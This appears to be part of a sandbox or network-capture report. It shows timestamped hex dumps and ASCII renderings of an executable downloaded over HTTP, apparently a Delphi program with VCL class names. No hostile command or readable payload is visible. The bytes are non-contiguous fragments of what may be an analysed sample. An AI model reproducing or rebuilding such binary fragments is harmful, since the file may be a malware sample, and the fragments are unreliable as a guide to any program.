                  2022-06-23 21:14:28 UTC16INData Raw: 8b 04 24 8b d7 e8 97 fd ff ff 59 5a 5d 5f 5e 5b c3 53 56 52 50 89 d3 31 c0 8b 4c 94 10 85 c9 74 03 03 41 fc 4a 75 f2 d1 e8 e8 5b fd ff ff 50 89 c6 8b 44 9c 14 89 f2 85 c0 74 0a 8b 48 fc 01 ce e8 7c df ff ff 4b 75 e9 5a 58 e8 52 fd ff ff 5a 5e 5b 58 8d 24 94 ff e0 c3 53 56 57 89 c6 89 d7 39 d0 74 72 85 f6 74 51 85 ff 74 54 8b 46 fc 8b 57 fc 29 d0 77 02 01 c2 52 c1 ea 02 74 26 8b 0e 8b 1f 39 d9 75 41 4a 74 15 8b 4e 04 8b 5f 04 39 d9 75 34 83 c6 08 83 c7 08 4a 75 e2 eb 06 83 c6 04 83 c7 04 5a 83 e2 02 74 0b 66 8b 0e 66 8b 1f 66 39 d9 75 21 01 c0 eb 1d 8b 57 fc 29 d0 eb 16 8b 46 fc 29 d0 eb 0f 5a 66 39 d9 75 09 c1 e9 10 c1 eb 10 66 39 d9 5f 5e 5b c3 8d 40 00 55 8b ec 53 56 57 8b f9 8b da 8b f0 8b c6 e8 51 fe ff ff 83 fb 01 7d 04 33 db eb 07 4b 3b c3 7d 02 8b
                  Data Ascii: $YZ]_^[SVRP1LtAJu[PDtH|KuZXRZ^[X$SVW9trtQtTFW)wRt&9uAJtN_9u4JuZtfff9u!W)F)Zf9uf9_^[@USVWQ}3K;}
                  2022-06-23 21:14:28 UTC32INData Raw: 00 0f d9 2c 24 66 89 0c 24 d9 e8 f7 40 04 00 00 00 80 74 27 ff 70 04 ff 30 81 64 24 04 ff ff ff 7f 68 ff ff ff 7f 68 ff ff ff ff df 6c 24 08 df 2c 24 d8 c2 de c1 83 c4 10 eb 02 df 28 df 04 24 d9 c1 4e d9 f8 df 1c 24 dc f9 8a 04 24 04 30 3c 3a 72 02 04 07 88 06 d9 c1 d8 d3 9b df e0 9e 73 e1 d9 6c 24 02 83 c4 04 dd c3 dd c2 dd c1 dd c0 59 29 f1 29 ca 76 10 29 d6 b0 30 01 d1 eb 03 88 04 32 4a 75 fa 88 06 c3 90 55 8b ec 56 89 e6 83 ec 20 31 c9 50 31 d2 8d 45 08 e8 1e ff ff ff 89 f2 58 e8 ee b6 ff ff 83 c4 20 5e 5d c2 08 00 8b c0 83 fa 20 76 02 31 d2 56 89 e6 83 ec 20 51 b9 10 00 00 00 e8 88 fe ff ff 89 f2 58 e8 c4 b6 ff ff 83 c4 20 5e c3 8d 40 00 53 56 83 c4 f4 8b d8 8b d4 8b c3 e8 a0 a1 ff ff 8b f0 83 3c 24 00 74 19 89 5c 24 04 c6 44 24 08 0b 8d 54 24 04 a1
                  Data Ascii: ,$f$@t'p0d$hhl$,$($N$$0<:rsl$Y))v)02JuUV 1P1EX ^] v1V QX ^@SV<$t\$D$T$
                  2022-06-23 21:14:28 UTC48INData Raw: 3c 38 00 74 60 85 ff 75 14 8a 00 25 ff 00 00 00 0f a3 05 0c 21 4d 00 73 4c b2 01 eb 48 8b f7 4e eb 01 4e 85 f6 7c 12 8a 0c 30 81 e1 ff 00 00 00 0f a3 0d 0c 21 4d 00 72 e9 8b cf 2b ce 81 e1 01 00 00 80 79 05 49 83 c9 fe 41 85 c9 75 04 b2 02 eb 13 8a 04 38 25 ff 00 00 00 0f a3 05 0c 21 4d 00 73 02 b2 01 8b c2 5f 5e c3 8d 40 00 53 56 8b f2 8b d8 33 c0 80 3d 50 57 4d 00 00 74 0f 8b c3 e8 e0 7a ff ff 8b d6 4a e8 68 ff ff ff 5e 5b c3 90 33 c9 80 3d 50 57 4d 00 00 74 07 e8 54 ff ff ff 8b c8 8b c1 c3 8d 40 00 53 56 8b f2 8b d8 8b c3 e8 af 78 ff ff 3b f0 7e 09 8b c3 e8 a4 78 ff ff 8b f0 8b d6 8b c3 e8 05 00 00 00 5e 5b c3 8b c0 53 56 57 8b f2 8b d8 33 ff 85 f6 7e 45 8b c3 e8 80 78 ff ff 3b f0 7f 3a 8b fe 80 3d 50 57 4d 00 00 74 2f b8 01 00 00 00 33 ff 3b f0 7c 24
                  Data Ascii: <8t`u%!MsLHNN|0!Mr+yIAu8%!Ms_^@SV3=PWMtzJh^[3=PWMtT@SVx;~x^[SVW3~Ex;:=PWMt/3;|$
                  2022-06-23 21:14:28 UTC64INData Raw: 00 76 05 e8 bd 27 ff ff 83 c3 80 33 c0 5a 59 59 64 89 10 eb 1b e9 fb 2c ff ff 8b 45 fc 66 8b 00 66 ba 10 00 e8 70 eb ff ff 33 db e8 11 31 ff ff 8b c3 5f 5e 5b 59 5d c3 90 55 8b ec 51 53 56 57 89 45 fc 8b 45 fc 66 8b 00 66 83 e8 01 72 10 74 12 66 83 e8 0a 74 26 66 83 e8 06 74 28 eb 2e 33 db eb 74 80 3d 20 24 4d 00 00 74 0d 66 ba 11 00 66 b8 01 00 e8 ac e6 ff ff 33 db eb 5a 8b 5d fc 8a 5b 08 eb 52 8b 5d fc 8a 5b 08 eb 4a 33 c0 55 68 c3 0b 41 00 64 ff 30 64 89 20 8b 45 fc e8 96 fa ff ff 8b d8 81 fb ff 00 00 00 76 05 e8 13 27 ff ff 33 c0 5a 59 59 64 89 10 eb 1b e9 54 2c ff ff 8b 45 fc 66 8b 00 66 ba 11 00 e8 c9 ea ff ff 33 db e8 6a 30 ff ff 8b c3 5f 5e 5b 59 5d c3 8b c0 55 8b ec 51 53 56 57 89 45 fc 8b 45 fc 0f b7 00 83 f8 11 0f 87 80 00 00 00 8a 80 0e 0c 41
                  Data Ascii: v'3ZYYd,Effp31_^[Y]UQSVWEEffrtft&ft(.3t= $Mtff3Z][R][J3UhAd0d Ev'3ZYYdT,Eff3j0_^[Y]UQSVWEEA
                  2022-06-23 21:14:28 UTC80INData Raw: c0 74 09 8b c3 e8 67 ac ff ff eb 73 8b d6 8b c3 e8 1c b2 ff ff eb 68 8b c3 e8 db cb ff ff 84 c0 74 5d 66 83 3e 01 75 57 8b c3 e8 42 ac ff ff 5e 5b c3 66 83 3b 01 75 25 66 83 3e 01 74 0b 8b c6 e8 b4 cb ff ff 84 c0 75 09 8b c3 e8 21 ac ff ff eb 2d 8b d6 8b c3 e8 d6 b1 ff ff eb 22 8b c3 e8 95 cb ff ff 84 c0 75 17 66 83 3e 01 75 11 8b c3 e8 fc ab ff ff 5e 5b c3 8b c3 e8 f2 ab ff ff 5e 5b c3 8d 40 00 55 8b ec 6a 00 6a 00 53 33 d2 55 68 15 4c 41 00 64 ff 32 64 89 22 83 e9 03 74 08 49 83 e9 02 72 25 eb 46 8d 55 fc a1 cc 46 4d 00 e8 78 18 ff ff 8b 4d fc b2 01 a1 68 7e 40 00 e8 ad 75 ff ff e8 fc ef fe ff eb 28 8d 55 f8 a1 24 46 4d 00 e8 55 18 ff ff 8b 4d f8 b2 01 a1 ac 7c 40 00 e8 8a 75 ff ff e8 d9 ef fe ff eb 05 e8 16 ae ff ff 33 c0 5a 59 59 64 89 10 68 1c 4c 41
                  Data Ascii: tgsht]f>uWB^[f;u%f>tu!-"uf>u^[^[@UjjS3UhLAd2d"tIr%FUFMxMh~@u(U$FMUM|@u3ZYYdhLA
                  2022-06-23 21:14:28 UTC96INData Raw: 42 69 44 69 4d 6f 64 65 01 00 00 00 00 03 00 00 00 00 8b 41 00 0d 62 64 4c 65 66 74 54 6f 52 69 67 68 74 0d 62 64 52 69 67 68 74 54 6f 4c 65 66 74 14 62 64 52 69 67 68 74 54 6f 4c 65 66 74 4e 6f 41 6c 69 67 6e 18 62 64 52 69 67 68 74 54 6f 4c 65 66 74 52 65 61 64 69 6e 67 4f 6e 6c 79 07 43 6c 61 73 73 65 73 8b c0 74 8b 41 00 03 02 2e 31 01 00 00 00 00 06 00 00 00 70 8b 41 00 07 73 73 53 68 69 66 74 05 73 73 41 6c 74 06 73 73 43 74 72 6c 06 73 73 4c 65 66 74 07 73 73 52 69 67 68 74 08 73 73 4d 69 64 64 6c 65 08 73 73 44 6f 75 62 6c 65 07 43 6c 61 73 73 65 73 90 c8 8b 41 00 06 0b 54 53 68 69 66 74 53 74 61 74 65 01 70 8b 41 00 8b c0 e0 8b 41 00 01 0c 54 48 65 6c 70 43 6f 6e 74 65 78 74 04 01 00 00 80 ff ff ff 7f 90 fc 8b 41 00 03 09 54 48 65 6c 70 54 79 70
                  Data Ascii: BiDiModeAbdLeftToRightbdRightToLeftbdRightToLeftNoAlignbdRightToLeftReadingOnlyClassestA.1pAssShiftssAltssCtrlssLeftssRightssMiddlessDoubleClassesATShiftStatepAATHelpContextATHelpTyp
                  2022-06-23 21:14:28 UTC112INData Raw: c3 8b 10 ff 52 14 48 85 c0 7c 67 40 89 45 f0 c7 45 f8 00 00 00 00 8d 4d f4 8b 55 f8 8b c3 8b 30 ff 56 0c 8b c3 e8 0f 06 00 00 8b d0 8d 45 ec e8 59 78 fe ff 8b 45 ec 8b 55 f4 e8 52 03 ff ff 8b f0 85 f6 74 25 8d 45 e8 50 8b ce 49 ba 01 00 00 00 8b 45 f4 e8 6c 7b fe ff 8b 55 e8 8b 4d fc 8b c3 8b 30 ff 56 34 85 c0 74 0f ff 45 f8 ff 4d f0 75 a4 c7 45 f8 ff ff ff ff 33 c0 5a 59 59 64 89 10 68 aa cb 41 00 8d 45 e8 ba 02 00 00 00 e8 36 76 fe ff 8d 45 f4 e8 0a 76 fe ff c3 e9 28 6f fe ff eb e3 8b 45 f8 5e 5b 8b e5 5d c3 90 53 56 57 55 8b ea 8b f8 8b c7 8b 10 ff 52 14 8b d8 4b 85 db 7c 14 43 33 f6 8b d6 8b c7 8b 08 ff 51 18 3b e8 74 07 46 4b 75 ef 83 ce ff 8b c6 5d 5f 5e 5b c3 55 8b ec 51 53 56 57 89 4d fc 8b fa 8b f0 8b 4d fc 8b d7 8b c6 8b 18 ff 53 60 8b 4d 08 8b
                  Data Ascii: RH|g@EEMU0VEYxEURt%EPIEl{UM0V4tEMuE3ZYYdhAE6vEv(oE^[]SVWURK|C3Q;tFKu]_^[UQSVWMMS`M
                  2022-06-23 21:14:28 UTC128INData Raw: cd 0b 42 00 dc 0b 42 00 ea 0b 42 00 f9 0b 42 00 e9 e9 00 00 00 55 e8 b6 fe ff ff 59 e9 dd 00 00 00 ba 01 00 00 00 8b 45 fc e8 4f 03 00 00 e9 cb 00 00 00 ba 02 00 00 00 8b 45 fc e8 3d 03 00 00 e9 b9 00 00 00 ba 04 00 00 00 8b 45 fc e8 2b 03 00 00 e9 a7 00 00 00 ba 0a 00 00 00 8b 45 fc e8 19 03 00 00 e9 95 00 00 00 8d 55 f8 8b 45 fc e8 25 fc ff ff e9 85 00 00 00 55 b8 01 00 00 00 e8 75 fe ff ff 59 eb 77 8b 45 fc e8 fa fd ff ff eb 6d 55 b8 01 00 00 00 e8 5d fe ff ff 59 eb 5f 55 e8 84 fe ff ff 59 eb 56 ba 04 00 00 00 8b 45 fc e8 c8 02 00 00 eb 47 ba 08 00 00 00 8b 45 fc e8 b9 02 00 00 eb 38 ba 08 00 00 00 8b 45 fc e8 aa 02 00 00 eb 29 55 b8 02 00 00 00 e8 19 fe ff ff 59 eb 1b ba 08 00 00 00 8b 45 fc e8 8d 02 00 00 eb 0c 55 b8 01 00 00 00 e8 fc fd ff ff 59 33
                  Data Ascii: BBBBUYEOE=E+EUE%UuYwEmU]Y_UYVEGE8E)UYEUY3
                  2022-06-23 21:14:28 UTC144INData Raw: 83 c4 f8 53 89 55 f8 89 45 fc 8b 45 f8 8b 15 a4 32 42 00 e8 01 ea fd ff 84 c0 0f 84 83 00 00 00 8b 45 fc e8 95 f7 ff ff 33 c0 55 68 a3 4b 42 00 64 ff 30 64 89 20 8b 5d f8 8b c3 e8 7d f7 ff ff 33 c0 55 68 86 4b 42 00 64 ff 30 64 89 20 8b 4b 10 8b 55 fc a1 e0 58 4d 00 e8 57 f1 ff ff 8a 53 18 8b 45 fc e8 7c 01 00 00 33 c0 5a 59 59 64 89 10 68 8d 4b 42 00 8b 45 f8 e8 4f f7 ff ff c3 e9 45 ef fd ff eb f0 33 c0 5a 59 59 64 89 10 68 b5 4b 42 00 8b 45 fc e8 32 f7 ff ff c3 e9 28 ef fd ff eb f0 8b 55 f8 8b 45 fc e8 3f 71 ff ff 5b 59 59 5d c3 8b c0 56 57 8b 40 10 8d 70 10 8b fa a5 a5 a5 a5 33 c0 89 02 5f 5e c3 8d 40 00 55 8b ec 51 53 8b da 89 45 fc 8b 45 fc e8 de f6 ff ff 33 c0 55 68 19 4c 42 00 64 ff 30 64 89 20 8b cb 8b 55 fc a1 e0 58 4d 00 e8 41 f0 ff ff 33 c0 5a
                  Data Ascii: SUEE2BE3UhKBd0d ]}3UhKBd0d KUXMWSE|3ZYYdhKBEOE3ZYYdhKBE2(UE?q[YY]VW@p3_^@UQSEE3UhLBd0d UXMA3Z
                  2022-06-23 21:14:28 UTC160INData Raw: cd ff ff eb 05 e8 db 4b fe ff 33 c0 5a 59 59 64 89 10 68 4e 8b 42 00 83 7d cc 00 74 0f 6a ff 8b 45 cc 50 8b 45 f0 50 e8 79 e3 fd ff 8b 45 d4 50 8b 45 f0 50 e8 64 e3 fd ff 50 e8 86 e2 fd ff c3 e9 84 af fd ff eb d0 33 c0 5a 59 59 64 89 10 68 f2 8b 42 00 83 7d f0 00 74 09 8b 45 f0 50 e8 5a e2 fd ff 8b 45 ec e8 7a 9d fd ff c3 e9 58 af fd ff eb e1 6a 00 6a 00 8d 45 ec 50 6a 00 8b 45 e8 50 8b 45 f4 50 e8 fb e1 fd ff 89 45 d8 83 7d d8 00 74 06 83 7d ec 00 75 15 e8 3f e0 fd ff 85 c0 75 07 e8 c2 cc ff ff eb 05 e8 37 4b fe ff 33 c0 55 68 da 8b 42 00 64 ff 30 64 89 20 8b 55 ec 8b ce 8b 45 f8 e8 24 4e ff ff 33 c0 5a 59 59 64 89 10 eb 18 e9 3d ac fd ff 8b 45 d8 50 e8 e4 e1 fd ff e8 07 b0 fd ff e8 56 b0 fd ff 33 c0 5a 59 59 64 89 10 68 12 8c 42 00 8b 45 f4 50 6a 00 e8
                  Data Ascii: K3ZYYdhNB}tjEPEPyEPEPdP3ZYYdhB}tEPZEzXjjEPjEPEPE}t}u?u7K3UhBd0d UE$N3ZYYd=EPV3ZYYdhBEPj
                  2022-06-23 21:14:28 UTC176INData Raw: 5a 4d 00 01 c3 55 8b ec 33 c0 55 68 31 cb 42 00 64 ff 30 64 89 20 ff 05 58 5a 4d 00 33 c0 5a 59 59 64 89 10 68 38 cb 42 00 c3 e9 9a 6f fd ff eb f8 5d c3 8b c0 83 2d 58 5a 4d 00 01 c3 55 8b ec 33 c0 55 68 69 cb 42 00 64 ff 30 64 89 20 ff 05 5c 5a 4d 00 33 c0 5a 59 59 64 89 10 68 70 cb 42 00 c3 e9 62 6f fd ff eb f8 5d c3 8b c0 83 2d 5c 5a 4d 00 01 c3 55 8b ec 33 c0 55 68 a1 cb 42 00 64 ff 30 64 89 20 ff 05 60 5a 4d 00 33 c0 5a 59 59 64 89 10 68 a8 cb 42 00 c3 e9 2a 6f fd ff eb f8 5d c3 8b c0 83 2d 60 5a 4d 00 01 c3 55 8b ec 33 c0 55 68 d9 cb 42 00 64 ff 30 64 89 20 ff 05 64 5a 4d 00 33 c0 5a 59 59 64 89 10 68 e0 cb 42 00 c3 e9 f2 6e fd ff eb f8 5d c3 8b c0 83 2d 64 5a 4d 00 01 c3 55 8b ec 33 c0 55 68 11 cc 42 00 64 ff 30 64 89 20 ff 05 68 5a 4d 00 33 c0 5a
                  Data Ascii: ZMU3Uh1Bd0d XZM3ZYYdh8Bo]-XZMU3UhiBd0d \ZM3ZYYdhpBbo]-\ZMU3UhBd0d `ZM3ZYYdhB*o]-`ZMU3UhBd0d dZM3ZYYdhBn]-dZMU3UhBd0d hZM3Z
                  2022-06-23 21:14:28 UTC192INData Raw: 6e 74 65 78 74 58 0b 43 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d4 0b 43 00 24 00 00 00 2c fc 42 00 c4 35 40 00 d0 35 40 00 d4 35 40 00 d8 35 40 00 cc 35 40 00 24 33 40 00 40 33 40 00 60 1f 42 00 48 6b 43 00 94 1f 42 00 94 36 43 00 c8 1f 42 00 40 37 43 00 18 1f 42 00 ac 1f 42 00 00 20 42 00 80 35 43 00 08 06 44 00 f4 35 43 00 30 06 44 00 6c 6b 43 00 6c 37 43 00 28 36 43 00 80 06 44 00 94 06 44 00 60 36 43 00 bc 06 44 00 bc 36 43 00 c4 06 44 00 dc 36 43 00 cc 06 44 00 74 6b 43 00 d0 37 43 00 10 38 43 00 fc 36 43 00 e0 06 44 00 e4 06 44 00 20 37 43 00 90 34 43 00 15 54 57 69 6e 43 6f 6e 74 72 6f 6c 41 63 74 69 6f 6e 4c 69 6e 6b 8b c0 f0 0b 43 00 0a 08 54 49 6d 65 4e 61 6d 65 8b c0 00 0c 43 00 01 0c 54 42 6f 72
                  Data Ascii: ntextXCC$,B5@5@5@5@5@$3@@3@`BHkCB6CB@7CBB B5CD5C0DlkCl7C(6CDD`6CD6CD6CDtkC7C8C6CDD 7C4CTWinControlActionLinkCTImeNameCTBor
                  2022-06-23 21:14:28 UTC208INData Raw: 08 83 c0 ec 50 8d 45 ef 50 e8 b7 26 fd ff 8b 45 08 83 c0 ec 50 8d 45 ef 50 e8 07 25 fd ff 85 c0 75 08 85 f6 7f b2 c6 45 ff 00 8a 45 ff 5f 5e 5b 8b e5 5d c3 90 55 8b ec 83 c4 e8 53 88 4d eb 8b da 89 45 fc 84 db 75 12 8b 45 fc f6 40 1c 10 74 69 8b 45 fc f6 40 51 04 75 60 8b 45 fc 83 78 30 00 74 57 8b 45 fc 8b 40 30 e8 cf 64 00 00 84 c0 74 48 8d 55 ec 8b 45 fc e8 4c f5 ff ff 80 7d eb 00 75 17 8b 45 fc 8b 40 30 f6 40 50 40 75 0b 55 e8 14 ff ff ff 59 84 c0 74 04 33 c0 eb 02 b0 01 f6 d8 1b c0 50 8d 45 ec 50 8b 45 fc 8b 40 30 e8 29 62 00 00 50 e8 13 26 fd ff 5b 8b e5 5d c3 8b c0 f6 40 50 40 0f 95 c1 8a 50 57 e8 65 ff ff ff c3 53 56 57 8b fa 8b d8 8b c3 e8 9e 61 01 00 8b f0 85 f6 74 13 3b de 74 0f 8b d7 8b c6 66 be c9 ff e8 93 e9 fc ff eb 16 8b 47 08 50 8b 4f 04
                  Data Ascii: PEP&EPEP%uEE_^[]USMEuE@tiE@Qu`Ex0tWE@0dtHUEL}uE@0@P@uUYt3PEPE@0)bP&[]@P@PWeSVWat;tfGPO
                  2022-06-23 21:14:28 UTC224INData Raw: 01 00 00 8b 78 08 4f 85 ff 7c 54 47 33 f6 8b 45 fc 8b 80 98 01 00 00 8b d6 e8 a7 2b fe ff 80 78 57 00 75 0c f6 40 1c 10 74 31 f6 40 51 04 75 2b f6 40 50 40 74 25 8b 50 44 03 50 4c 52 8b 50 40 03 50 48 52 8b 50 44 52 8b 40 40 50 53 e8 7b e2 fc ff 89 45 f4 83 7d f4 01 74 04 46 4f 75 af 83 7d f4 01 74 0d 8b d3 8b 45 fc 8b 08 ff 91 b8 00 00 00 8b 45 f0 50 53 e8 11 e3 fc ff 33 c9 8b d3 8b 45 fc e8 61 00 00 00 33 c0 5a 59 59 64 89 10 68 bf 8b 43 00 8b 45 f8 83 78 04 00 75 12 8d 45 b0 50 8b 45 fc e8 33 22 00 00 50 e8 5d e4 fc ff c3 e9 13 af fc ff eb dd 5f 5e 5b 8b e5 5d c3 8b c0 83 c4 f0 c7 04 24 0f 00 00 00 89 54 24 04 33 d2 89 54 24 08 33 d2 89 54 24 0c 8b d4 8b 08 ff 51 f0 83 c4 10 c3 8d 40 00 53 56 57 55 83 c4 e0 8b d9 8b ea 8b f0 80 be a8 01 00 00 00 74 1f
                  Data Ascii: xO|TG3E+xWu@t1@Qu+@P@t%PDPLRP@PHRPDR@@PS{E}tFOu}tEEPS3Ea3ZYYdhCExuEPE3"P]_^[]$T$3T$3T$Q@SVWUt
                  2022-06-23 21:14:28 UTC240INData Raw: 8b f3 eb 21 8b d7 8b 46 14 3a 50 10 75 15 8b c6 e8 50 03 00 00 50 8b c6 e8 84 fe ff ff 5a 92 2b c2 eb 23 8b f0 8b 43 1c 3b 70 64 75 d7 8b cf 8b 43 1c 8b 50 64 3a 4a 10 75 05 8b 40 68 eb 07 8b c2 e8 1f 03 00 00 83 c4 10 5f 5e 5b c3 53 56 57 8b f0 8b c6 e8 f8 fd ff ff 85 c0 0f 84 8f 00 00 00 80 7e 10 00 0f 84 85 00 00 00 8b c6 e8 f3 03 00 00 8b d8 8a 46 10 fe c8 74 06 fe c8 74 12 eb 20 ba 01 00 00 00 8b c6 e8 10 ff ff ff 8b f8 eb 12 ba 02 00 00 00 8b c6 e8 00 ff ff ff 8b f8 eb 02 33 ff 8b c6 e8 a7 fd ff ff 50 8b c7 5a 8b ca 99 f7 f9 8b f0 85 db 74 37 83 7b 0c 00 75 0b 8b d7 8b c3 e8 c5 02 00 00 eb 12 8b c3 e8 d0 fd ff ff 8b d0 03 d6 8b c3 e8 b1 02 00 00 8b c3 e8 0a 01 00 00 8b c3 e8 53 03 00 00 8b d8 85 db 75 c9 5f 5e 5b c3 90 53 56 57 8b f2 8b d8 8b c6 e8
                  Data Ascii: !F:PuPPZ+#C;pduCPd:Ju@h_^[SVW~Ftt 3PZt7{uSu_^[SVW
                  2022-06-23 21:14:28 UTC256INData Raw: 04 b8 8b 15 c0 ff 43 00 e8 30 2a fc ff 85 c0 74 08 8b 14 24 8b 08 ff 51 68 47 4e 75 dc 8d 43 7c 8b 14 24 e8 d1 36 fc ff 8b c3 8b 10 ff 52 30 5a 5f 5e 5b c3 90 53 56 57 51 89 14 24 8b d8 8b 04 24 3b 83 80 00 00 00 74 42 8b 43 50 8b 70 08 4e 85 f6 7c 27 46 33 ff 8b 43 50 8b 40 04 8b 04 b8 8b 15 c0 ff 43 00 e8 d2 29 fc ff 85 c0 74 08 8b 14 24 8b 08 ff 51 6c 47 4e 75 dc 8b 04 24 89 83 80 00 00 00 8b c3 8b 10 ff 52 30 5a 5f 5e 5b c3 90 53 56 57 51 66 89 14 24 8b d8 66 8b 04 24 66 3b 83 84 00 00 00 74 45 8b 43 50 8b 70 08 4e 85 f6 7c 28 46 33 ff 8b 43 50 8b 40 04 8b 04 b8 8b 15 c0 ff 43 00 e8 73 29 fc ff 85 c0 74 09 66 8b 14 24 8b 08 ff 51 70 47 4e 75 db 66 8b 04 24 66 89 83 84 00 00 00 8b c3 8b 10 ff 52 30 5a 5f 5e 5b c3 8d 40 00 53 56 57 55 8b da 8b e8 3a 9d
                  Data Ascii: C0*t$QhGNuC|$6R0Z_^[SVWQ$$;tBCPpN|'F3CP@C)t$QlGNu$R0Z_^[SVWQf$f$f;tECPpN|(F3CP@Cs)tf$QpGNuf$fR0Z_^[@SVWU:
                  2022-06-23 21:14:28 UTC272INData Raw: 08 8d 70 f0 8d 7a a4 a5 a5 a5 a5 8b 45 08 8b 40 c8 8b 40 4c 8b 10 ff 52 2c 8b 55 08 8b 52 f8 8b 4d 08 2b 51 f0 3b c2 7d 4a 8b 45 08 8b 40 c8 8b 40 4c 8b 10 ff 52 2c 8b 55 08 8b 52 f8 8b 4d 08 2b 51 f0 2b d0 d1 fa 79 03 83 d2 00 8b 45 08 03 50 f0 42 8b 45 08 89 50 f0 8b 45 08 8b 40 c8 8b 40 4c 8b 10 ff 52 2c 8b 55 08 03 42 f0 8b 55 08 89 42 f8 8b 45 08 8b 40 c8 8b 40 4c 8b 10 ff 52 20 8b 55 08 8b 52 fc 8b 4d 08 2b 51 f4 3b c2 7d 4a 8b 45 08 8b 40 c8 8b 40 4c 8b 10 ff 52 20 8b 55 08 8b 52 fc 8b 4d 08 2b 51 f4 2b d0 d1 fa 79 03 83 d2 00 8b 45 08 03 50 f4 42 8b 45 08 89 50 f4 8b 45 08 8b 40 c8 8b 40 4c 8b 10 ff 52 20 8b 55 08 03 42 f4 8b 55 08 89 42 fc 8b 45 08 8b 40 c8 8b 48 4c 8b 45 08 8d 50 f0 8b 45 08 8b 40 d8 e8 7c 07 fe ff 8b 45 08 8b 55 08 8d 70 a4 8d
                  Data Ascii: pzE@@LR,URM+Q;}JE@@LR,URM+Q+yEPBEPE@@LR,UBUBE@@LR URM+Q;}JE@@LR URM+Q+yEPBEPE@@LR UBUBE@HLEPE@|EUp
                  2022-06-23 21:14:28 UTC288INData Raw: 2c 44 00 e8 45 24 fd ff a1 a0 28 44 00 e8 ff 22 fd ff b2 01 a1 88 92 41 00 e8 37 a8 fb ff a3 b0 5b 4d 00 b2 01 a1 40 33 44 00 e8 26 a8 fb ff a3 a4 5b 4d 00 b2 01 a1 ac 33 44 00 e8 51 16 fe ff a3 a8 5b 4d 00 c3 8d 40 00 54 8b 44 00 01 0d 54 53 63 72 6f 6c 6c 42 61 72 49 6e 63 03 01 00 00 00 ff 7f 00 00 70 8b 44 00 03 0f 54 53 63 72 6f 6c 6c 42 61 72 53 74 79 6c 65 01 00 00 00 00 02 00 00 00 6c 8b 44 00 09 73 73 52 65 67 75 6c 61 72 06 73 73 46 6c 61 74 0a 73 73 48 6f 74 54 72 61 63 6b 05 46 6f 72 6d 73 fc 8b 44 00 00 00 00 00 00 00 00 00 00 00 00 00 20 8c 44 00 00 00 00 00 00 00 00 00 00 00 00 00 08 8c 44 00 48 00 00 00 dc 92 41 00 c4 35 40 00 d0 35 40 00 d4 35 40 00 d8 35 40 00 cc 35 40 00 24 33 40 00 40 33 40 00 c8 bc 41 00 d8 bd 41 00 e0 bd 41 00 bc ae
                  Data Ascii: ,DE$(D"A7[M@3D&[M3DQ[M@TDTScrollBarIncpDTScrollBarStylelDssRegularssFlatssHotTrackFormsD DDHA5@5@5@5@5@$3@@3@AAA
                  2022-06-23 21:14:28 UTC304INData Raw: ff 6a 00 6a 00 53 68 fc cb 44 00 8a 4b 5e 80 f1 01 ba 68 cb 44 00 8b c6 8b 38 ff 57 04 53 68 c8 cb 44 00 53 68 e0 cb 44 00 8a 4b 5e 80 f1 01 ba 80 cb 44 00 8b c6 8b 38 ff 57 04 53 68 a8 cb 44 00 6a 00 6a 00 33 c9 ba 94 cb 44 00 8b c6 8b 18 ff 53 04 5f 5e 5b c3 00 00 ff ff ff ff 0d 00 00 00 50 69 78 65 6c 73 50 65 72 49 6e 63 68 00 00 00 ff ff ff ff 0a 00 00 00 54 65 78 74 48 65 69 67 68 74 00 00 ff ff ff ff 12 00 00 00 49 67 6e 6f 72 65 46 6f 6e 74 50 72 6f 70 65 72 74 79 00 00 53 56 8b f2 8b d8 8b c6 e8 13 24 fd ff 84 c0 74 09 b2 01 8b c3 e8 8a 7c fe ff 5e 5b c3 8d 40 00 53 56 8b f2 8b d8 8b c6 e8 b7 2e fd ff 89 83 70 02 00 00 5e 5b c3 8b c0 53 56 8b f2 8b d8 8b c3 e8 2b 00 00 00 8b d0 8b c6 e8 1e 47 fd ff 5e 5b c3 8d 40 00 53 56 8b f2 8b d8 8b c3 e8 b3
                  Data Ascii: jjShDK^hD8WShDShDK^D8WShDjj3DS_^[PixelsPerInchTextHeightIgnoreFontPropertySV$t|^[@SV.p^[SV+G^[@SV
                  2022-06-23 21:14:28 UTC320INData Raw: 00 55 8b ec 51 53 56 57 89 45 fc 8b 45 fc 80 b8 a6 01 00 00 00 74 5d 8b 45 fc e8 5a 70 fe ff 8b f0 4e 85 f6 7c 4e 46 33 ff 8b d7 8b 45 fc e8 0a 70 fe ff 8b d8 80 7b 57 00 74 10 8b 45 08 50 8b c3 e8 8b ff ff ff 59 84 c0 75 21 8b c3 8b 15 4c 0c 43 00 e8 c1 29 fb ff 84 c0 74 14 8b 45 08 50 8b c3 e8 9a ff ff ff 59 84 c0 74 04 b0 01 eb 06 47 4e 75 b5 33 c0 5f 5e 5b 59 5d c3 90 55 8b ec 51 53 89 55 fc 8b d8 f6 43 1c 10 75 3e 80 bb a6 01 00 00 00 74 35 55 8b 83 20 02 00 00 e8 2f ff ff ff 59 84 c0 75 1a 55 8b c3 e8 22 ff ff ff 59 84 c0 75 0d 55 8b c3 e8 45 ff ff ff 59 84 c0 74 0a 8b 45 fc c7 40 0c 01 00 00 00 5b 59 5d c3 8b c0 55 8b ec 53 56 8b 45 08 8b 40 fc 8b 80 f0 02 00 00 85 c0 74 38 8b 55 08 8b 58 08 4b 85 db 7c 2d 43 33 f6 8b 45 08 8b 40 fc 8b 80 f0 02 00
                  Data Ascii: UQSVWEEt]EZpN|NF3Ep{WtEPYu!LC)tEPYtGNu3_^[Y]UQSUCu>t5U /YuU"YuUEYtE@[Y]USVE@t8UXK|-C3E@
